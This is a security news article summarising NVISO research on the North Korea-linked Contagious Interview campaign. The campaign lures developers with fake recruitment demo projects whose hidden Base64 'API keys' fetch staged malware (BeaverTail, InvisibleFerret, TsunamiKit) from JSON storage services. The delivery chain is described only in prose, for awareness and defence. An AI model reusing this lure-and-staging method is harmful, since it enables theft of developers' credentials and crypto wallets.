North Korea-Linked Contagious Interview Campaign Adopts Sophisticated Malware Delivery via JSON Services

Introduction

A persistent cyber espionage operation tied to North Korea has refined its tactics, targeting software developers worldwide with increasingly sophisticated malware campaigns. Known as the Contagious Interview campaign, this threat leverages legitimate platforms and developer-focused tools to mask malicious activity, exploiting the trust of developers in recruitment processes and demo projects. Recent reports from NVISO reveal how attackers now exploit JSON storage services to deliver malware, signaling a new level of operational sophistication in the landscape of cyber threats.

Evolution of the Contagious Interview Campaign

Active since November 2023, the Contagious Interview campaign specifically targets software developers working across Windows, Linux, and macOS environments, with a strong focus on professionals involved in crypto and Web3 technologies. Threat actors pose as recruiters or collaborators on platforms like LinkedIn, offering demo projects or interview-related tasks to lure victims into executing malicious code.

NVISO’s latest research shows a shift in tactics: attackers now utilize legitimate JSON storage services such as JSON Keeper, JSONsilo, and npoint.io to host and deliver malware. These services, originally intended for sharing structured data, are being misused to store obfuscated payloads. Developers who clone or run these “demo projects” inadvertently trigger malware downloads, exposing themselves to sophisticated threats such as the BeaverTail and OtterCookie infostealers, as well as the InvisibleFerret RAT.

The attack flow is highly deceptive. Hidden files within the demo projects contain Base64-encoded “API keys” that redirect the software to a JSON storage URL, which in turn hosts the next-stage malware. Once executed, BeaverTail steals sensitive information, while InvisibleFerret provides a Python backdoor capable of downloading additional tools, including TsunamiKit from Pastebin. TsunamiKit has been linked to system profiling, data exfiltration, and deployment of further payloads from Tor servers, illustrating the campaign’s layered approach.

Attackers have expanded their reach beyond JSON storage, leveraging repositories on GitHub-like platforms to host trojanized projects. NVISO researchers identified multiple malicious repositories and tracked related IP addresses and payloads hosted even on platforms like Railway. This extensive use of legitimate platforms underscores the actors’ intent to blend in with normal developer traffic and maintain operational stealth.

Experts advise extreme caution: developers should avoid executing code from unverified repositories, especially when linked to unsolicited recruitment processes. Config files should be meticulously reviewed for unusual patterns, such as embedded Base64 keys or hidden payload references, which are telltale signs of a malware attempt. NVISO’s analysis confirms that the campaign aims to compromise developers for sensitive data, including crypto wallets, emphasizing the high stakes involved.

What Undercode Say:

The Contagious Interview campaign exemplifies a shift in cyber espionage from broad phishing attacks to highly targeted, skill-specific exploitation. By focusing on developers, particularly those involved in emerging technologies like Web3 and crypto, North Korea-linked actors maximize the potential value of compromised credentials, intellectual property, and digital assets.

The strategic use of legitimate services such as JSON Keeper and GitHub-like repositories is particularly concerning. These platforms inherently trust user-contributed content, which lowers the likelihood of automatic security detection. Attackers exploit this trust to deploy multi-stage malware pipelines, where each stage appears benign but gradually escalates control over the target system. This “low-and-slow” method makes the campaign resilient to standard endpoint protection measures.

From a technical perspective, the inclusion of TsunamiKit alongside BeaverTail and InvisibleFerret signals an evolution toward modular malware ecosystems. Modular frameworks allow attackers to swap, upgrade, or customize payloads without redeploying the initial lure, enhancing operational longevity and reducing detection risk. Moreover, the Base64-encoded API keys represent a clever obfuscation tactic, evading simple static code analysis while directing victims to legitimate-looking external storage.

Social engineering remains central to this campaign. By masquerading as recruiters, attackers exploit the psychological principle of authority and professional ambition. Developers seeking career opportunities are conditioned to trust demo projects or coding assignments, creating a high probability that the malicious content will be executed. This method demonstrates that even technologically savvy individuals are vulnerable to well-crafted psychological manipulations combined with technical subterfuge.

In broader terms, the campaign reflects an ongoing trend in state-sponsored cyber operations: the convergence of social engineering, developer ecosystems, and legitimate online infrastructure. By weaponizing trusted platforms and focusing on high-value targets, actors achieve maximum disruption with minimal overt exposure. This emphasizes the necessity for organizations to implement secure coding practices, strict repository verification, and comprehensive threat awareness training for developers.

The campaign also illustrates the evolving threat landscape of Web3 and crypto-focused development. As digital assets gain prominence, they attract actors capable of exploiting both technical and human vulnerabilities. Developers must recognize that routine tools, cloud services, and even recruitment interactions can become vectors for intrusion if not rigorously validated. The sophistication of this campaign indicates that future threats will likely combine technical innovation with targeted social engineering on professional platforms, raising the stakes for cybersecurity vigilance.

Fact Checker Results:

✅ NVISO confirms North Korea-linked actors behind the Contagious Interview campaign.
✅ Use of JSON storage services for malware delivery is verified.
❌ There is no evidence that the Tor server currently used by TsunamiKit is active.

Prediction:

📊 The Contagious Interview campaign is likely to expand its targeting beyond crypto and Web3 developers, potentially including AI and blockchain researchers. Expect increasingly modular malware frameworks and enhanced social engineering tactics, leveraging professional networking sites to maintain a low-profile, high-impact attack strategy.